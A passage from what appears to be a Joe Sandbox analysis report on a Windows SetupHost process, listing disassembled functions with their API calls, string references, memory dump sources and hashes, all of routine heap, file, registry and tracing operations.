                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$LocalSystemVariant
                                                                                                                        • String ID: Def$|T
                                                                                                                        • API String ID: 2941933870-2268153386
                                                                                                                        • Opcode ID: 634e175cb5ebd0b5d6b3e9b3f028be467b1fb602b122733f6a8a0d59d61029a9
                                                                                                                        • Instruction ID: 58a7c635d89e41c005c524fc952d7830fc95429c50ffb581937bbfcfc3507ee2
                                                                                                                        • Opcode Fuzzy Hash: 634e175cb5ebd0b5d6b3e9b3f028be467b1fb602b122733f6a8a0d59d61029a9
                                                                                                                        • Instruction Fuzzy Hash: 83F03A71A0060DAB8F00DFB9E9598EEBBF8FB4C204B100865E602E3150DA34AA099722
                                                                                                                        Function 005072FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
                                                                                                                          • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
                                                                                                                        • RtlRaiseStatus.NTDLL(00000000,C000000D), ref: 0050734C
                                                                                                                        Strings
                                                                                                                        • onecore\base\xml\udom_modify.cpp, xrefs: 0050731B
                                                                                                                        • Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext, xrefs: 00507326
                                                                                                                        • RtlIsMicrodomUpdateContextValid(TheContext), xrefs: 00507334
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: RaiseStatus$Print
                                                                                                                        • String ID: RtlIsMicrodomUpdateContextValid(TheContext)$Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
                                                                                                                        • API String ID: 1346358973-3284681492
                                                                                                                        • Opcode ID: 0650abd99063c301a79f6bbe21665b3d2797a3c5a70c734878b4f6b9dbbe97fb
                                                                                                                        • Instruction ID: 1d02c85883c4b8e7ad8eb7271c77aeb2c0a29b6709c80156cb3a5633981def73
                                                                                                                        • Opcode Fuzzy Hash: 0650abd99063c301a79f6bbe21665b3d2797a3c5a70c734878b4f6b9dbbe97fb
                                                                                                                        • Instruction Fuzzy Hash: 0DF096B0E0020DABCB04EFA0D8596AF7FB4BF95304F40445EA402A7241DB78A744CB94
                                                                                                                        Function 00501108 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501124
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501136
                                                                                                                        • SetLastError.KERNEL32(00000000,?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501145
                                                                                                                        Strings
                                                                                                                        • SYSTEM\CurrentControlSet\Control\MiniNT, xrefs: 0050111E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorLastOpen
                                                                                                                        • String ID: SYSTEM\CurrentControlSet\Control\MiniNT
                                                                                                                        • API String ID: 3190611558-2757998475
                                                                                                                        • Opcode ID: 3154df2c1b32d3fe1b50c80b83a59854ec0a7a4009fdc5846fd6f671137ba64f
                                                                                                                        • Instruction ID: aaba0bb8f82a8b8728ccfc349e741064d8df20166c2d5dcc5a4176d2eec86b5c
                                                                                                                        • Opcode Fuzzy Hash: 3154df2c1b32d3fe1b50c80b83a59854ec0a7a4009fdc5846fd6f671137ba64f
                                                                                                                        • Instruction Fuzzy Hash: 9FE09B31654328FBDB2497A19C09B9FBE6CEB04F66F100011BA01E10D0D6749E00FAE5
                                                                                                                        Function 00523458 Relevance: 6.4, APIs: 5, Instructions: 109memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 005255C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000,?,00000008,00000000,00528CDB,00528CDB,?,005289FD,00000000), ref: 00525625
                                                                                                                          • Part of subcall function 0051F4B4: GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88), ref: 0051F50C
                                                                                                                          • Part of subcall function 0051F4B4: GetLastError.KERNEL32(?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000), ref: 0051F516
                                                                                                                          • Part of subcall function 0051F4B4: GetLastError.KERNEL32(?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000), ref: 0051F52C
                                                                                                                          • Part of subcall function 0051F4B4: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000), ref: 0051F58E
                                                                                                                          • Part of subcall function 0051F4B4: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88), ref: 0051F595
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 0052353B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 00523546
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 00523557
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 0052355E
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 00523569
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHeapLast$FileFreeProcess$CloseCreateHandleSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3165482735-0
                                                                                                                        • Opcode ID: 362e53a068c61dae99fbc661b61b0b8b49ea728ac0f292fe5ceb26955bc65bb4
                                                                                                                        • Instruction ID: 9f9ded375ac08ab92f3e0b1d39386ae566f8b4633f92ad6fc14840ad01d6bb77
                                                                                                                        • Opcode Fuzzy Hash: 362e53a068c61dae99fbc661b61b0b8b49ea728ac0f292fe5ceb26955bc65bb4
                                                                                                                        • Instruction Fuzzy Hash: C731F671F006256BCF18ABB8B84AA7E7FAABFD2314F084568E502972D1DB74CE019740
                                                                                                                        Function 005313C0 Relevance: 6.3, APIs: 5, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 00531410
                                                                                                                        • memmove.MSVCRT(?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8,?,?,?,?,?,?,?,00530CB2,?), ref: 00531430
                                                                                                                        • memset.MSVCRT ref: 0053144E
                                                                                                                        • memmove.MSVCRT(?,0000FFF8,0000FFF8,?,00000000,00001FFF,?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8,?,?,?), ref: 00531461
                                                                                                                        • memmove.MSVCRT(?,?,?,?,0000FFF8,0000FFF8,?,00000000,00001FFF,?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8), ref: 00531477
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memmove$memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3790616698-0
                                                                                                                        • Opcode ID: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
                                                                                                                        • Instruction ID: 6c8d4c877019f22c78116cd04ef9607104fddd5b1b0edebada4a36cd09c6a6dd
                                                                                                                        • Opcode Fuzzy Hash: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
                                                                                                                        • Instruction Fuzzy Hash: 24217176600A09AFD714DBB9C99AD6FBBEDEF88714B00062EE446C7A41DA70FD018B50
                                                                                                                        Function 0052A28B Relevance: 6.3, APIs: 5, Instructions: 78memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000), ref: 0052A2CD
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0052A2D4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0052A327
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052A32E
                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 0052A343
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocErrorFreeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3300557996-0
                                                                                                                        • Opcode ID: 5b452b0b1f88bb51b23b1636f5e0ed04bfc5b6a206f738ce788cf0242fed0ffb
                                                                                                                        • Instruction ID: ba5f37a10d5f73dc41a1d64097909a8a6587ef0a0e54ad5712b7174a3f09a79c
                                                                                                                        • Opcode Fuzzy Hash: 5b452b0b1f88bb51b23b1636f5e0ed04bfc5b6a206f738ce788cf0242fed0ffb
                                                                                                                        • Instruction Fuzzy Hash: 1C21AE75E00325EFCB14CFA9E99876EBFB5FF99312F118458D409A7280C7309D058B91
                                                                                                                        Function 0052405E Relevance: 6.3, APIs: 5, Instructions: 69memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000020,00000001,?,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001), ref: 00524091
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 00524098
                                                                                                                        • SetLastError.KERNEL32(0000000E,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240A6
                                                                                                                          • Part of subcall function 00524131: GetProcessHeap.KERNEL32(00000008,00000C00,00524083,00000001,?,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000), ref: 00524138
                                                                                                                          • Part of subcall function 00524131: HeapAlloc.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 0052413F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240EC
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Alloc$ErrorFreeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2557328389-0
                                                                                                                        • Opcode ID: 9974b1c03187243795e4aca07a100e4b871a3a00eea676ee4389180b4243ca75
                                                                                                                        • Instruction ID: 0f26e941232950bff3b1585b8a03411cb2ffb9b1c85d148cca3e459c327ea9de
                                                                                                                        • Opcode Fuzzy Hash: 9974b1c03187243795e4aca07a100e4b871a3a00eea676ee4389180b4243ca75
                                                                                                                        • Instruction Fuzzy Hash: 11114F75604316EBDB109FA5E889B6B3FA8BF5A315F008469FA05DB1C0DE70D9449F60
                                                                                                                        Function 0052921C Relevance: 6.3, APIs: 5, Instructions: 63memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00528E5B,?,00528EC0,00000000,005292C0,00000001,?,?,?,00000000,00000000,?), ref: 00529237
                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000,?,00528CDB,?,00000000,00000000), ref: 00529256
                                                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00528CDB,?,00000000,00000000), ref: 0052926C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00528CDB,?,00000000,00000000), ref: 00529273
                                                                                                                        • SetLastError.KERNEL32(00000008,?,00528CDB,?,00000000,00000000), ref: 00529281
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalHeapSection$AllocEnterErrorLastLeaveProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2288769807-0
                                                                                                                        • Opcode ID: d99a737e3083e0ea9cfcf3fb34773d45773dbe365940baf6cea218177aa6c47a
                                                                                                                        • Instruction ID: 0fa7089b9a257117d8b809ea11281162cd63093c28a263057653be363051b6b5
                                                                                                                        • Opcode Fuzzy Hash: d99a737e3083e0ea9cfcf3fb34773d45773dbe365940baf6cea218177aa6c47a
                                                                                                                        • Instruction Fuzzy Hash: F5216D79601B01EBCB24CF18E994A22BBF5FF99711B10592EE44AC3B40D730F8448F90
                                                                                                                        Function 004FF278 Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF023
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF02F
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF041
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF053
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF065
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF077
                                                                                                                          • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF0B7
                                                                                                                          • Part of subcall function 004FEFEF: GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 004FF0CE
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00552428,00000A4C,0051F080,?,?,00000000,00000000), ref: 004FF2C6
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF31B
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF344
                                                                                                                        • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00552428,00000A4C,0051F080), ref: 004FF41E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: memset$CompareString$ErrorLastNamePathVolume
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3838570357-0
                                                                                                                        • Opcode ID: 8d5bd78f64cec26978be99f53e4ff6bdbd87b1c88145653b80820581845491d0
                                                                                                                        • Instruction ID: 59842920a286848ffc735560db54b2c46dd57f22b54881ac4de9fe1c79d30c22
                                                                                                                        • Opcode Fuzzy Hash: 8d5bd78f64cec26978be99f53e4ff6bdbd87b1c88145653b80820581845491d0
                                                                                                                        • Instruction Fuzzy Hash: F1510675A0022D9BCF24DB14DD40BAEB774FF48720F1042E6EA19A26D0D7785E88CF48
                                                                                                                        Function 0054E160 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 0054E1BC
                                                                                                                        • GetTraceLoggerHandle.ADVAPI32(00000000), ref: 0054E1C9
                                                                                                                        • GetTraceEnableLevel.ADVAPI32(00000000), ref: 0054E1D9
                                                                                                                        • GetTraceEnableFlags.ADVAPI32(00000000), ref: 0054E1E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Trace$Enable$FlagsHandleLevelLoggermemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1282773000-0
                                                                                                                        • Opcode ID: 0fa65393bfaa1e643fe7fc848c40b162cdd935b08cffb34fa108cbacb15c8bf9
                                                                                                                        • Instruction ID: 39968acde253bd7c6ee9038b88c468517a2863d9a35cdac6650badf2b3fee8fa
                                                                                                                        • Opcode Fuzzy Hash: 0fa65393bfaa1e643fe7fc848c40b162cdd935b08cffb34fa108cbacb15c8bf9
                                                                                                                        • Instruction Fuzzy Hash: 7341AF366097419BC720CF29D895AA7BFF5FF89315F184A2CE8CA87691D770E804DB50
                                                                                                                        Function 00548064 Relevance: 6.1, APIs: 4, Instructions: 77memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00552AF8,00000020,005481A4), ref: 005480AB
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00552AF8,00000020,005481A4), ref: 005480B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617791916-0
                                                                                                                        • Opcode ID: 8d1c455a223eaa8c2805a163674a4c51b16a5db97b2eeafa129365d69a2cedbb
                                                                                                                        • Instruction ID: 69ecdf9a0ce6885fcf5dca9cfb70b5c4f9e27229f577e3b5b84dae9cf036e501
                                                                                                                        • Opcode Fuzzy Hash: 8d1c455a223eaa8c2805a163674a4c51b16a5db97b2eeafa129365d69a2cedbb
                                                                                                                        • Instruction Fuzzy Hash: B4215AB5D00219DFDB14CF99DC496EEBAB5FF48314F14412AE814B3290DA758945DFA0
                                                                                                                        Function 0052C260 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileSizeEx.KERNEL32(?,?), ref: 0052C2DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileSize
                                                                                                                        • String ID: Incorrect filesize. Could be corrupted$VerifyFileByHandle
                                                                                                                        • API String ID: 3433856609-3984483981
                                                                                                                        • Opcode ID: fcd0b6fc731cf8d5bf31830431426548cec057dfedc0c140c6e55233c82a117b
                                                                                                                        • Instruction ID: 2ff5474bb525508333c6356419a41824735aedb42814173c0289dfebb19cb043
                                                                                                                        • Opcode Fuzzy Hash: fcd0b6fc731cf8d5bf31830431426548cec057dfedc0c140c6e55233c82a117b
                                                                                                                        • Instruction Fuzzy Hash: B5416D32204322AB8B21DE14E88496FBFA5BF9A760F148D1EF955972D1D730DA44CB92
                                                                                                                        Function 005171E8 Relevance: 5.1, APIs: 4, Instructions: 131memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000028,?,?), ref: 0051724C
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00517253
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005172A4
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005172AB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocFree
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 756756679-0
                                                                                                                        • Opcode ID: cf46412499a65d6f5cd288234655e48f08815a677e4100a79752f368cad69000
                                                                                                                        • Instruction ID: 4c4eec56fd00ae4c2994378ed53050cccfa8c5fd5412a3c6506b6f6bf41e77a1
                                                                                                                        • Opcode Fuzzy Hash: cf46412499a65d6f5cd288234655e48f08815a677e4100a79752f368cad69000
                                                                                                                        • Instruction Fuzzy Hash: FB415F74A0460ADFEB14CF58C494AAEBFF5FF4D300B148499E825DB250D730E985DB60
                                                                                                                        Function 00510091 Relevance: 5.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000020,?,?,00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 005100AE
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 005100B5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 00510113
                                                                                                                        • HeapFree.KERNEL32(00000000,?,0050FC8B,00000000,00000000,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0051011A
                                                                                                                        Memory Dump Source
